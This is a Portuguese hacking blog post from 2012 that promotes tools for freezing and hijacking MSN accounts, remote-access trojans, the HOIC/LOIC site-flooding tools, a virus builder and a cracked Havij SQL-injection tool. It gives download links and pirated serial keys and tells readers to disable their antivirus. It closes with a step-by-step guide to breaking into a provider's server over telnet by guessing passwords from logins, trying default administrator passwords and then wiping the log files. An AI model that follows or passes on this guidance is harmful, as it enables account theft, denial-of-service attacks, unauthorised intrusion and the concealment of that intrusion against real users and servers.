Congelador de MSN

quinta-feira, 23 de agosto de 2012

Ele deixa a net lenta e congela MSN de alguem ok.Print abaixo.Virus como todo programa hacker. (Não nocivo ao computador)


Olá Hoje venho falar sobre o HotSpot Shield 2.23 (Camuflador de IPele camufla o IP, de qualquer pessoa bom,  é só isso ... Print abaixo.


Msn Hacker v5.0 esse é pra você que quer se vinga daquele Amigo, Hackeando o Msn Dele.

Conhecimento não é crime, Não me responsabilizo pelos seus atos.Print abaixo.


Para quem quer invadir computadores (Aconselho a baixar só quem tem experiencia com isso.)Print abaixo.Tem virus como todos os programas hackers (Não é Nocivo)


    Como Usar? Você extrai  e onde ta HTTP://  é onde você vai colocar o Site que deseja Hackear/Copiar, em Directory to save files é a pasta que você vai salvar os arquivos depois disso Só clicar em Go Download it!
Ta Mais isso vai me Ajudar em Que? Boom se você não faz a minima ideia de como criar um site você pode usar este programa para COPIAR algum site que você admira assim só vai precisar baixar o Macromedia Dreamweaver e Camuflar o Site entende Mudar as Cores E talls esse programa era usado por alguns Hackers preguiçosos…
OBS: Plágio é Crime então nem te Conheço!

Eai galera da losownedshps12, estou trazendo o Poltergeist v11, olha sendo sincero eu não o conheço, mas ouço que as vezes tentativas de hackiar 20% o Poltergeist v11 é usado. Se você o conhece  diga alguma coisa em nosso site a respeito. Pra que não o conhece o esquema é meio do ProRat. Vou da uma procurada e postar o tutorial.Print Abaixo.


Galera esse programa muito bom! ele é meio chato de registra mas eu ponho a serial pra vocês.
Em fim, não é preciso colocar IP nem a Port ele já tem uma scan próprio.
Não tenho muito oque falar só usando pra descobrir.

­
DH10A-0064-5612-1234-37B5-9701
DH10A-0064-6666-6666-1BF7-1419
­
DH10A-0064-4004-04E8-4E6F-E4BE
DH10A-0064-0003-03FB-AD13-B293
dh10a-0064-5612-1234-37b5-9701
­
457457774535354



Isso é pra quem mais joga SA-MP e quer zoar com os caras do servidor.Print abaixo.



Bem ele não é complicado de usar basta você entender de programas hacker que você vai saber usar.Tem vírus como todo programa hacker.Pois desativem seus anti vírus (Vírus Não Nocivo)

Download: http://www.4shared.com/zip/46EWuv1a/Good-Bye-v52.html

Bem são dois programas super bons para derrubar sites porem nada complicado pouco eficaz.
 Download : http://www.4shared.com/folder/y9_G2Ook/Hack_HOIC_LOIC.html

Bem ele cria vírus super simples. Print abaixo.

                                                               Download : http://www.mediafire.com/?pc4wi6sui0gs02w

Bom vim falar desse programa tão conhecido bom normalmente ele é usado para invadir banco de dados da maioria das pessoas que gostam de sacanear donos de Habbos.


Depois de baixar você executa ele e clica em register e clica em file e poe o arquivo HavijKey.lic e digita no nome Cracked@By.Exidous e clica para continuar ai pode usar ele normalmente. Não coloquei print pois estou com o Computador bugado.


OS MEIOS MAIS COMUNS DE SE CONSEGUIR SENHAS DE ACESSO ESTÃO LISTADOS ABAIXO :

CAVALO DE TRÓIA

O Hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.

FAREJAMENTO DE REDES

Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

ENGENHARIA SOCIAL

É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

QUEBRA CABEÇA

Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

INVASÃO DO SERVIDOR

O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

DEDUÇÃO

Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

MÃOS A OBRA !!!

Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bobba do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.   Vem plagia vem concorrencia

by: Phoenix